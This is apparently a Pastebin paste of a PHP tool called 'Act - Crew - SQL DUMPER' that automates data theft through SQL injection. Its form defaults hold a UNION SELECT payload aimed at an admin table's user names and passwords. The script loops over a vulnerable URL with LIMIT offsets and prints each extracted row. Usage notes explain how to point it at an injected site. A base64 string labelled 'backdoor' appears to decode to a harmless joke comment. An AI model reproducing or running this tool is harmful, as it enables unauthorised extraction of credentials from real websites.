TrojanSpot

SQL Dumper | www.pemula.info

Sep 21st, 2012
248
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.43 KB | None | 0 0
  1. <?php
  2. //Act - Crew - SQL DUMPER
  3. ?>
  4. <title>Act - Crew - SQL DUMPER</title>
  5. <style type="text/css">
  6. body {
  7. background-color: #D8D8D8;
  8. font-family: Arial, Verdana, Helvetica, sans-serif;
  9. font-size: 12px;
  10. color: #000000;
  11. }
  12. .textbox {
  13.     border: #000000 1px solid;
  14.     font-size: 12px;
  15.     font-family: Arial, Verdana, Helvetica, sans-serif;
  16.     background-color: #D8D8D8;
  17. }
  18. </style>
  19. <form action="" method="post">
  20. Site:<br /><input name="site" class="textbox" type="text" value="http://www.site.com/x.php?id=-99+UNION+ALL+SELECT+1,Neutralise,3+from+admin--" size="180"/><br />
  21. Dump:<br /><input name="data" class="textbox" type="text" value="user_name,0x3a,password" size="180"/><br /><br />
  22. <input name="submit_lol" class="textbox" value="Submit" type="submit">
  23. </form>
  24. <font size=1px><b>Usage:</b> Enter in the site you have injected, with 'Neutralise' in the visible col.<br />
  25. Then enter into the dump the cols you wish to extract, adding the 0x3a between each for readability.<br />
  26. Just like in the above example.</font>
  27. <?php
  28. set_time_limit(0);
  29. if (isset($_POST["submit_lol"])) {
  30. $site = $_POST['site'];
  31. $userdata = $_POST['data'];
  32. $inj = "unhex(hex(concat(0x4E65757472616C6973653a,".$userdata.",0x4E65757472616C6973653a)))";
  33. $count = "concat(0x4E65757472616C697365,count(*),0x4E65757472616C697365)";
  34.  
  35. echo "<br /><br />[+] Dumping URL : ".$site."";
  36. $old = array('unhex(hex(concat(0x4E65757472616C6973653a,', '0x3a,' ,',0x4E65757472616C6973653a)))');
  37. $new   = array("", "", "");
  38. $dumpn = str_replace($old, $new, $inj);
  39. $pieces = explode(",", $dumpn);
  40. echo "<br />[+] Extracting : ";
  41. foreach ($pieces as $piece) {
  42. echo "".$piece.",";
  43. }
  44.  
  45. $totalcount = str_replace("Neutralise", $count, $site);
  46. $limit = get($totalcount);
  47. if (!$limit){
  48. echo "<br />[+] Dead injection point!";
  49. }
  50. else{
  51. echo "<br />[+] Found ".$limit." entries to extract.<br /><br />";
  52. }
  53. $i = 0;
  54. while ($i<$limit) {
  55. $i2 = $i + 1;
  56. $old = array("Neutralise", "--");
  57. $new   = array($inj, "+limit+".$i.",1--");
  58. $siteinj = str_replace($old, $new, $site);
  59. $siteinjresult = get($siteinj);
  60. if (!$siteinjresult){
  61. echo "<br />[+] Wrong cols!";
  62. }
  63. else{
  64. echo "".$i2." ".$siteinjresult.":<br />";
  65. }
  66. $i++;
  67. }
  68. }
  69.  
  70. function get($site){
  71. $GET = @file_get_contents($site);
  72. if (preg_match("/Neutralise(.*?)Neutralise/i",$GET, $matches))  {
  73. return $matches[1];
  74. }
  75. }
  76. //backdoor!!?
  77. $str = "PCEtLUxPTCBqdXN0IG1lc3Npbmcgd2l0aCB5YSEgWEQtLT4=";
  78. echo base64_decode($str);
  79. ?>
Add Comment
Please, Sign In to add comment